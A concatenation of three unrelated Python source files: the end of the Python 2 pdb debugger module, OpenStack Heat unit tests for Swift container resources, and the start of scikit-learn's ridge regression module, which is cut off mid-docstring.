def do_unalias(self, arg):
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
#list of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
print >>self.stdout, '>',
else:
print >>self.stdout, ' ',
print >>self.stdout, self.format_stack_entry(frame_lineno,
prompt_prefix)
# Help methods (derived from pdb.doc)
def help_help(self):
self.help_h()
def help_h(self):
print >>self.stdout, """h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command
"help pdb" pipes the full documentation file to the $PAGER
"help exec" gives help on the ! command"""
def help_where(self):
self.help_w()
def help_w(self):
print >>self.stdout, """w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command."""
help_bt = help_w
def help_down(self):
self.help_d()
def help_d(self):
print >>self.stdout, """d(own)
Move the current frame one level down in the stack trace
(to a newer frame)."""
def help_up(self):
self.help_u()
def help_u(self):
print >>self.stdout, """u(p)
Move the current frame one level up in the stack trace
(to an older frame)."""
def help_break(self):
self.help_b()
def help_b(self):
print >>self.stdout, """b(reak) ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted."""
def help_clear(self):
self.help_cl()
def help_cl(self):
print >>self.stdout, "cl(ear) filename:lineno"
print >>self.stdout, """cl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
Note that the argument is different from previous versions of
the debugger (in python distributions 1.5.1 and before) where
a linenumber was used instead of either filename:lineno or
breakpoint numbers."""
def help_tbreak(self):
print >>self.stdout, """tbreak same arguments as break, but breakpoint is
removed when first hit."""
def help_enable(self):
print >>self.stdout, """enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers."""
def help_disable(self):
print >>self.stdout, """disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers."""
def help_ignore(self):
print >>self.stdout, """ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true."""
def help_condition(self):
print >>self.stdout, """condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional."""
def help_step(self):
self.help_s()
def help_s(self):
print >>self.stdout, """s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function)."""
def help_until(self):
self.help_unt()
def help_unt(self):
print """unt(il)
Continue execution until the line with a number greater than the current
one is reached or until the current frame returns"""
def help_next(self):
self.help_n()
def help_n(self):
print >>self.stdout, """n(ext)
Continue execution until the next line in the current function
is reached or it returns."""
def help_return(self):
self.help_r()
def help_r(self):
print >>self.stdout, """r(eturn)
Continue execution until the current function returns."""
def help_continue(self):
self.help_c()
def help_cont(self):
self.help_c()
def help_c(self):
print >>self.stdout, """c(ont(inue))
Continue execution, only stop when a breakpoint is encountered."""
def help_jump(self):
self.help_j()
def help_j(self):
print >>self.stdout, """j(ump) lineno
Set the next line that will be executed."""
def help_debug(self):
print >>self.stdout, """debug code
Enter a recursive debugger that steps through the code argument
(which is an arbitrary expression or statement to be executed
in the current environment)."""
def help_list(self):
self.help_l()
def help_l(self):
print >>self.stdout, """l(ist) [first [,last]]
List source code for the current file.
Without arguments, list 11 lines around the current line
or continue the previous listing.
With one argument, list 11 lines starting at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count."""
def help_args(self):
self.help_a()
def help_a(self):
print >>self.stdout, """a(rgs)
Print the arguments of the current function."""
def help_p(self):
print >>self.stdout, """p expression
Print the value of the expression."""
def help_pp(self):
print >>self.stdout, """pp expression
Pretty-print the value of the expression."""
def help_exec(self):
print >>self.stdout, """(!) statement
Execute the (one-line) statement in the context of
the current stack frame.
The exclamation point can be omitted unless the first word
of the statement resembles a debugger command.
To assign to a global variable you must always prefix the
command with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)"""
def help_run(self):
print """run [args...]
Restart the debugged python program. If a string is supplied, it is
splitted with "shlex" and the result is used as the new sys.argv.
History, breakpoints, actions and debugger options are preserved.
"restart" is an alias for "run"."""
help_restart = help_run
def help_quit(self):
self.help_q()
def help_q(self):
print >>self.stdout, """q(uit) or exit - Quit from the debugger.
The program being executed is aborted."""
help_exit = help_q
def help_whatis(self):
print >>self.stdout, """whatis arg
Prints the type of the argument."""
def help_EOF(self):
print >>self.stdout, """EOF
Handles the receipt of EOF as a command."""
def help_alias(self):
print >>self.stdout, """alias [name [command [parameter parameter ...] ]]
Creates an alias called 'name' the executes 'command'. The command
must *not* be enclosed in quotes. Replaceable parameters are
indicated by %1, %2, and so on, while %* is replaced by all the
parameters. If no command is given, the current alias for name
is shown. If no name is given, all aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is recursively
applied to the first word of the command line; all other words
in the line are left alone.
Some useful aliases (especially when placed in the .pdbrc file) are:
#Print instance variables (usage "pi classInst")
alias pi for k in %1.__dict__.keys(): print "%1.",k,"=",%1.__dict__[k]
#Print instance variables in self
alias ps pi self
"""
def help_unalias(self):
print >>self.stdout, """unalias name
Deletes the specified alias."""
def help_commands(self):
print >>self.stdout, """commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber. The
commands themselves appear on the following lines. Type a line
containing just 'end' to terminate the commands.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
You can use breakpoint commands to start your program up again.
Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations) terminates
the command list (as if that command was immediately followed by end).
This is because any time you resume execution
(even with a simple next or step), you may encounter
another breakpoint--which could have its own command list, leading to
ambiguities about which list to execute.
If you use the 'silent' command in the command list, the
usual message about stopping at a breakpoint is not printed. This may
be desirable for breakpoints that are to print a specific message and
then continue. If none of the other commands print anything, you
see no sign that the breakpoint was reached.
"""
def help_pdb(self):
help()
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def _runscript(self, filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
})
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self._wait_for_mainpyfile = 1
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = 0
statement = 'execfile( "%s")' % filename
self.run(statement)
# Simplified interface
def run(statement, globals=None, locals=None):
Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
# B/W compatibility
run(statement, globals, locals)
def runcall(*args, **kwds):
return Pdb().runcall(*args, **kwds)
def set_trace():
Pdb().set_trace(sys._getframe().f_back)
# Post-Mortem interface
def post_mortem(t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
p = Pdb()
p.reset()
p.interaction(None, t)
def pm():
post_mortem(sys.last_traceback)
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
run(TESTCMD)
# print help
def help():
for dirname in sys.path:
fullname = os.path.join(dirname, 'pdb.doc')
if os.path.exists(fullname):
sts = os.system('${PAGER-more} '+fullname)
if sts: print '*** Pager exit status:', sts
break
else:
print 'Sorry, can\'t find the help file "pdb.doc"',
print 'along the Python search path'
def main():
if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
print "usage: pdb.py scriptfile [arg] ..."
sys.exit(2)
mainpyfile = sys.argv[1] # Get script filename
if not os.path.exists(mainpyfile):
print 'Error:', mainpyfile, 'does not exist'
sys.exit(1)
del sys.argv[0] # Hide "pdb.py" from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
# Note on saving/restoring sys.argv: it's a good idea when sys.argv was
# modified by the script being debugged. It's a bad idea when it was
# changed by the user from the command line. There is a "restart" command which
# allows explicit specification of command line arguments.
pdb = Pdb()
while True:
try:
pdb._runscript(mainpyfile)
if pdb._user_requested_quit:
break
print "The program finished and will be restarted"
except Restart:
print "Restarting", mainpyfile, "with arguments:"
print "\t" + " ".join(sys.argv[1:])
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print "The program exited via sys.exit(). Exit status: ",
print sys.exc_info()[1]
except:
traceback.print_exc()
print "Uncaught exception. Entering post mortem debugging"
print "Running 'cont' or 'step' will restart the program"
t = sys.exc_info()[2]
pdb.interaction(None, t)
print "Post mortem debugger finished. The "+mainpyfile+" will be restarted"
# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
import pdb
pdb.main()
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
import swiftclient.client as sc
from heat.common import exception
from heat.common import template_format
from heat.engine.resources.openstack.swift import swift
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
SWIFT_TEMPLATE = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "Template to test OS::Swift::Container resources",
"Resources" : {
"SwiftContainerWebsite" : {
"Type" : "OS::Swift::Container",
"DeletionPolicy" : "Delete",
"Properties" : {
"X-Container-Read" : ".r:*",
"X-Container-Meta" : {
"Web-Index" : "index.html",
"Web-Error" : "error.html"
}
}
},
"SwiftAccountMetadata" : {
"Type" : "OS::Swift::Container",
"DeletionPolicy" : "Delete",
"Properties" : {
"X-Account-Meta" : {
"Temp-Url-Key" : "secret"
}
}
},
"S3Bucket" : {
"Type" : "AWS::S3::Bucket",
"Properties" : {
"SwiftContainer" : {"Ref" : "SwiftContainer"}
}
},
"SwiftContainer" : {
"Type" : "OS::Swift::Container",
"Properties" : {
}
}
}
}
'''
class SwiftTest(common.HeatTestCase):
def setUp(self):
super(SwiftTest, self).setUp()
self.t = template_format.parse(SWIFT_TEMPLATE)
def _create_container(self, stack, definition_name='SwiftContainer'):
resource_defns = stack.t.resource_definitions(stack)
container = swift.SwiftContainer('test_resource',
resource_defns[definition_name],
stack)
runner = scheduler.TaskRunner(container.create)
runner()
self.assertEqual((container.CREATE, container.COMPLETE),
container.state)
return container
@mock.patch('swiftclient.client.Connection.put_container')
def test_create_container_name(self, mock_put):
# Setup
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['name'] = 'the_name'
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
container_name = container.physical_resource_name()
# Verify
self.assertEqual('the_name', container_name)
mock_put.assert_called_once_with('the_name', {})
def test_build_meta_headers(self):
# Setup
headers = {'Web-Index': 'index.html', 'Web-Error': 'error.html'}
# Test
self.assertEqual({}, swift.SwiftContainer._build_meta_headers(
'container', {}))
self.assertEqual({}, swift.SwiftContainer._build_meta_headers(
'container', None))
built = swift.SwiftContainer._build_meta_headers('container', headers)
# Verify
expected = {
'X-Container-Meta-Web-Index': 'index.html',
'X-Container-Meta-Web-Error': 'error.html'
}
self.assertEqual(expected, built)
@mock.patch('swiftclient.client.Connection.head_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_attributes(self, mock_put, mock_head):
# Setup
headers = {'content-length': '0',
'x-container-object-count': '82',
'accept-ranges': 'bytes',
'x-trans-id': 'tx08ea48ef2fa24e6da3d2f5c188fd938b',
'date': 'Wed, 23 Jan 2013 22:48:05 GMT',
'x-timestamp': '1358980499.84298',
'x-container-read': '.r:*',
'x-container-bytes-used': '17680980',
'content-type': 'text/plain; charset=utf-8'}
mock_head.return_value = headers
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
# Verify Attributes
self.assertEqual(container_name, container.FnGetRefId())
self.assertEqual('82', container.FnGetAtt('ObjectCount'))
self.assertEqual('17680980', container.FnGetAtt('BytesUsed'))
self.assertEqual('server.test', container.FnGetAtt('DomainName'))
self.assertEqual(headers, container.FnGetAtt('HeadContainer'))
self.assertEqual(headers, container.FnGetAtt('show'))
expected_url = 'http://server.test:5000/v3/%s' % container.FnGetRefId()
self.assertEqual(expected_url, container.FnGetAtt('WebsiteURL'))
self.assertRaises(exception.InvalidTemplateAttribute,
container.FnGetAtt, 'Foo')
# Verify Expected Calls
mock_put.assert_called_once_with(container_name, {})
self.assertTrue(mock_head.call_count > 0)
@mock.patch('swiftclient.client.Connection.put_container')
def test_public_read(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
properties = self.t['Resources']['SwiftContainer']['Properties']
properties['X-Container-Read'] = '.r:*'
stack = utils.parse_stack(self.t)
# Test
self._create_container(stack)
# Verify
expected = {'X-Container-Read': '.r:*'}
mock_put.assert_called_once_with(container_name, expected)
@mock.patch('swiftclient.client.Connection.put_container')
def test_public_read_write(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
properties = self.t['Resources']['SwiftContainer']['Properties']
properties['X-Container-Read'] = '.r:*'
properties['X-Container-Write'] = '.r:*'
stack = utils.parse_stack(self.t)
# Test
self._create_container(stack)
# Verify
expected = {'X-Container-Write': '.r:*', 'X-Container-Read': '.r:*'}
mock_put.assert_called_once_with(container_name, expected)
@mock.patch('swiftclient.client.Connection.put_container')
def test_container_headers(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
# Test
self._create_container(stack,
definition_name='SwiftContainerWebsite')
# Verify
expected = {'X-Container-Meta-Web-Error': 'error.html',
'X-Container-Meta-Web-Index': 'index.html',
'X-Container-Read': '.r:*'}
mock_put.assert_called_once_with(container_name, expected)
@mock.patch('swiftclient.client.Connection.post_account')
@mock.patch('swiftclient.client.Connection.put_container')
def test_account_headers(self, mock_put, mock_post):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
# Test
self._create_container(stack,
definition_name='SwiftAccountMetadata')
# Verify
mock_put.assert_called_once_with(container_name, {})
expected = {'X-Account-Meta-Temp-Url-Key': 'secret'}
mock_post.assert_called_once_with(expected)
@mock.patch('swiftclient.client.Connection.put_container')
def test_default_headers_not_none_empty_string(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
# Verify
mock_put.assert_called_once_with(container_name, {})
self.assertEqual({}, container.metadata_get())
@mock.patch('swiftclient.client.Connection.delete_container')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_exception(self, mock_put, mock_get, mock_delete):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
mock_delete.side_effect = sc.ClientException('test-delete-failure')
mock_get.return_value = ({'name': container_name}, [])
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
self.assertRaises(exception.ResourceFailure, runner)
# Verify
self.assertEqual((container.DELETE, container.FAILED),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
mock_delete.assert_called_once_with(container_name)
@mock.patch('swiftclient.client.Connection.delete_container')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_not_found(self, mock_put, mock_get, mock_delete):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
mock_delete.side_effect = sc.ClientException('missing',
http_status=404)
mock_get.return_value = ({'name': container_name}, [])
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
runner()
# Verify
self.assertEqual((container.DELETE, container.COMPLETE),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
mock_delete.assert_called_once_with(container_name)
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_non_empty_not_allowed(self, mock_put, mock_get):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
stack = utils.parse_stack(self.t)
mock_get.return_value = ({'name': container_name},
[{'name': 'test_object'}])
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
ex = self.assertRaises(exception.ResourceFailure, runner)
# Verify
self.assertEqual((container.DELETE, container.FAILED),
container.state)
self.assertIn('ResourceActionNotSupported: resources.test_resource: '
'Deleting non-empty container',
six.text_type(ex))
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
@mock.patch('swiftclient.client.Connection.delete_container')
@mock.patch('swiftclient.client.Connection.delete_object')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_non_empty_allowed(self, mock_put, mock_get,
mock_delete_object,
mock_delete_container):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
get_return_values = [
({'name': container_name},
[{'name': 'test_object1'},
{'name': 'test_object2'}]),
({'name': container_name}, [{'name': 'test_object1'}]),
]
mock_get.side_effect = get_return_values
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
runner()
# Verify
self.assertEqual((container.DELETE, container.COMPLETE),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_delete_container.assert_called_once_with(container_name)
self.assertEqual(2, mock_get.call_count)
self.assertEqual(2, mock_delete_object.call_count)
@mock.patch('swiftclient.client.Connection.delete_container')
@mock.patch('swiftclient.client.Connection.delete_object')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_non_empty_allowed_not_found(self, mock_put, mock_get,
mock_delete_object,
mock_delete_container):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
mock_get.return_value = ({'name': container_name},
[{'name': 'test_object'}])
mock_delete_object.side_effect = sc.ClientException('object-is-gone',
http_status=404)
mock_delete_container.side_effect = sc.ClientException(
'container-is-gone', http_status=404)
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
runner()
# Verify
self.assertEqual((container.DELETE, container.COMPLETE),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
mock_delete_object.assert_called_once_with(container_name,
'test_object')
mock_delete_container.assert_called_once_with(container_name)
@mock.patch('swiftclient.client.Connection.delete_object')
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_non_empty_fails_delete_object(self, mock_put, mock_get,
mock_delete_object):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
mock_get.return_value = ({'name': container_name},
[{'name': 'test_object'}])
mock_delete_object.side_effect = (
sc.ClientException('object-delete-failure'))
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
self.assertRaises(exception.ResourceFailure, runner)
# Verify
self.assertEqual((container.DELETE, container.FAILED),
container.state)
mock_put.assert_called_once_with(container_name, {})
mock_get.assert_called_once_with(container_name)
mock_delete_object.assert_called_once_with(container_name,
'test_object')
@mock.patch('swiftclient.client.Connection.put_container')
def test_delete_retain(self, mock_put):
# Setup
container_name = utils.PhysName('test_stack', 'test_resource')
self.t['Resources']['SwiftContainer']['DeletionPolicy'] = 'Retain'
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.delete)
runner()
# Verify
self.assertEqual((container.DELETE, container.COMPLETE),
container.state)
mock_put.assert_called_once_with(container_name, {})
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_check(self, mock_put, mock_get):
# Setup
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.check)
runner()
self.assertEqual((container.CHECK, container.COMPLETE),
container.state)
@mock.patch('swiftclient.client.Connection.get_container')
@mock.patch('swiftclient.client.Connection.put_container')
def test_check_fail(self, mock_put, mock_get):
# Setup
res_prop = self.t['Resources']['SwiftContainer']['Properties']
res_prop['PurgeOnDelete'] = True
stack = utils.parse_stack(self.t)
mock_get.side_effect = Exception('boom')
# Test
container = self._create_container(stack)
runner = scheduler.TaskRunner(container.check)
ex = self.assertRaises(exception.ResourceFailure, runner)
# Verify
self.assertIn('boom', six.text_type(ex))
self.assertEqual((container.CHECK, container.FAILED),
container.state)
def test_refid(self):
stack = utils.parse_stack(self.t)
rsrc = stack['SwiftContainer']
rsrc.resource_id = 'xyz'
self.assertEqual('xyz', rsrc.FnGetRefId())
def test_refid_convergence_cache_data(self):
cache_data = {'SwiftContainer': {
'uuid': mock.ANY,
'id': mock.ANY,
'action': 'CREATE',
'status': 'COMPLETE',
'reference_id': 'xyz_convg'
}}
stack = utils.parse_stack(self.t, cache_data=cache_data)
rsrc = stack['SwiftContainer']
self.assertEqual('xyz_convg', rsrc.FnGetRefId())
|
|
"""
Ridge regression
"""
# Author: Mathieu Blondel <[email protected]>
# Reuben Fletcher-Costin <[email protected]>
# Fabian Pedregosa <[email protected]>
# License: Simplified BSD
from abc import ABCMeta, abstractmethod
import warnings
import numpy as np
from scipy import linalg
from scipy import sparse
from scipy.sparse import linalg as sp_linalg
from .base import LinearClassifierMixin, LinearModel
from ..base import RegressorMixin
from ..utils.extmath import safe_sparse_dot
from ..utils import safe_asarray
from ..preprocessing import LabelBinarizer
from ..grid_search import GridSearchCV
def ridge_regression(X, y, alpha, sample_weight=1.0, solver='auto',
max_iter=None, tol=1e-3):
"""Solve the ridge equation by the method of normal equations.
Parameters
----------
X : {array-like, sparse matrix, LinearOperator},
shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_targets]
Target values
max_iter : int, optional
Maximum number of iterations for conjugate gradient solver.
The default value is determined by scipy.sparse.linalg.
sample_weight : float or numpy array of shape [n_samples]
Individual weights for each sample
solver : {'auto', 'dense_cholesky', 'lsqr', 'sparse_cg'}
Solver to use in the computational routines:
- 'auto' chooses the solver automatically based on the type of data.
- 'dense_cholesky' uses the standard scipy.linalg.solve function to
obtain a closed-form solution.
- 'sparse_cg' uses the conjugate gradient solver as found in
scipy.sparse.linalg.cg. As an iterative algorithm, this solver is
more appropriate than 'dense_cholesky' for large-scale data
(possibility to set `tol` and `max_iter`).
- 'lsqr' uses the dedicated regularized least-squares routine
scipy.sparse.linalg.lsqr. It is the fatest but may not be available
in old scipy versions. It also uses an iterative procedure.
All three solvers support both dense and sparse data.
tol: float
Precision of the solution.
Returns
-------
coef: array, shape = [n_features] or [n_targets, n_features]
Weight vector(s).
Notes
-----
This function won't compute the intercept.
"""
n_samples, n_features = X.shape
has_sw = isinstance(sample_weight, np.ndarray) or sample_weight != 1.0
if solver == 'auto':
# cholesky if it's a dense array and cg in
# any other case
if hasattr(X, '__array__'):
solver = 'dense_cholesky'
else:
solver = 'sparse_cg'
elif solver == 'lsqr' and not hasattr(sp_linalg, 'lsqr'):
warnings.warn("""lsqr not available on this machine, falling back
to sparse_cg.""")
solver = 'sparse_cg'
if has_sw:
solver = 'dense_cholesky'
if solver == 'sparse_cg':
# gradient descent
X1 = sp_linalg.aslinearoperator(X)
if y.ndim == 1:
y1 = np.reshape(y, (-1, 1))
else:
y1 = y
coefs = np.empty((y1.shape[1], n_features))
if n_features > n_samples:
def mv(x):
return X1.matvec(X1.rmatvec(x)) + alpha * x
else:
def mv(x):
return X1.rmatvec(X1.matvec(x)) + alpha * x
for i in range(y1.shape[1]):
y_column = y1[:, i]
if n_features > n_samples:
# kernel ridge
# w = X.T * inv(X X^t + alpha*Id) y
C = sp_linalg.LinearOperator(
(n_samples, n_samples), matvec=mv, dtype=X.dtype)
coef, info = sp_linalg.cg(C, y_column, tol=tol)
coefs[i] = X1.rmatvec(coef)
else:
# ridge
# w = inv(X^t X + alpha*Id) * X.T y
y_column = X1.rmatvec(y_column)
C = sp_linalg.LinearOperator(
(n_features, n_features), matvec=mv, dtype=X.dtype)
coefs[i], info = sp_linalg.cg(C, y_column, maxiter=max_iter,
tol=tol)
if info != 0:
raise ValueError("Failed with error code %d" % info)
if y.ndim == 1:
coefs = np.ravel(coefs)
return coefs
elif solver == "lsqr":
if y.ndim == 1:
y1 = np.reshape(y, (-1, 1))
else:
y1 = y
coefs = np.empty((y1.shape[1], n_features))
# According to the lsqr documentation, alpha = damp^2.
sqrt_alpha = np.sqrt(alpha)
for i in range(y1.shape[1]):
y_column = y1[:, i]
coefs[i] = sp_linalg.lsqr(X, y_column, damp=sqrt_alpha,
atol=tol, btol=tol, iter_lim=max_iter)[0]
if y.ndim == 1:
coefs = np.ravel(coefs)
return coefs
else:
# normal equations (cholesky) method
if n_features > n_samples or has_sw:
# kernel ridge
# w = X.T * inv(X X^t + alpha*Id) y
K = safe_sparse_dot(X, X.T, dense_output=True)
if has_sw:
# We are doing a little danse with the sample weights to
# avoid copying the original X, which could be big
sw = np.sqrt(sample_weight)
if y.ndim == 1:
y = y * sw
else:
# Deal with multiple-output problems
y = y * sw[:, np.newaxis]
K *= np.outer(sw, sw)
K.flat[::n_samples + 1] += alpha
dual_coef = linalg.solve(K, y,
sym_pos=True, overwrite_a=True)
if has_sw:
if dual_coef.ndim == 1:
dual_coef *= sw
else:
# Deal with multiple-output problems
dual_coef *= sw[:, np.newaxis]
coef = safe_sparse_dot(X.T, dual_coef, dense_output=True)
else:
# ridge
# w = inv(X^t X + alpha*Id) * X.T y
A = safe_sparse_dot(X.T, X, dense_output=True)
A.flat[::n_features + 1] += alpha
Xy = safe_sparse_dot(X.T, y, dense_output=True)
coef = linalg.solve(A, Xy, sym_pos=True, overwrite_a=True)
return coef.T
class _BaseRidge(LinearModel):
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, max_iter=None, tol=1e-3, solver="auto"):
self.alpha = alpha
self.fit_intercept = fit_intercept
self.normalize = normalize
self.copy_X = copy_X
self.max_iter = max_iter
self.tol = tol
self.solver = solver
def fit(self, X, y, sample_weight=1.0):
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
X, y, X_mean, y_mean, X_std = self._center_data(
X, y, self.fit_intercept, self.normalize, self.copy_X,
sample_weight=sample_weight)
self.coef_ = ridge_regression(X, y,
alpha=self.alpha,
sample_weight=sample_weight,
max_iter=self.max_iter,
tol=self.tol)
self._set_intercept(X_mean, y_mean, X_std)
return self
class Ridge(_BaseRidge, RegressorMixin):
"""Linear least squares with l2 regularization.
This model solves a regression model where the loss function is
the linear least squares function and regularization is given by
the l2-norm. Also known as Ridge Regression or Tikhonov regularization.
This estimator has built-in support for multi-variate regression
(i.e., when y is a 2d-array of shape [n_samples, n_targets]).
Parameters
----------
alpha : float
Small positive values of alpha improve the conditioning of the problem
and reduce the variance of the estimates. Alpha corresponds to
``(2*C)^-1`` in other linear models such as LogisticRegression or
LinearSVC.
copy_X : boolean, optional, default True
If True, X will be copied; else, it may be overwritten.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
max_iter : int, optional
Maximum number of iterations for conjugate gradient solver.
The default value is determined by scipy.sparse.linalg.
normalize : boolean, optional
If True, the regressors X are normalized
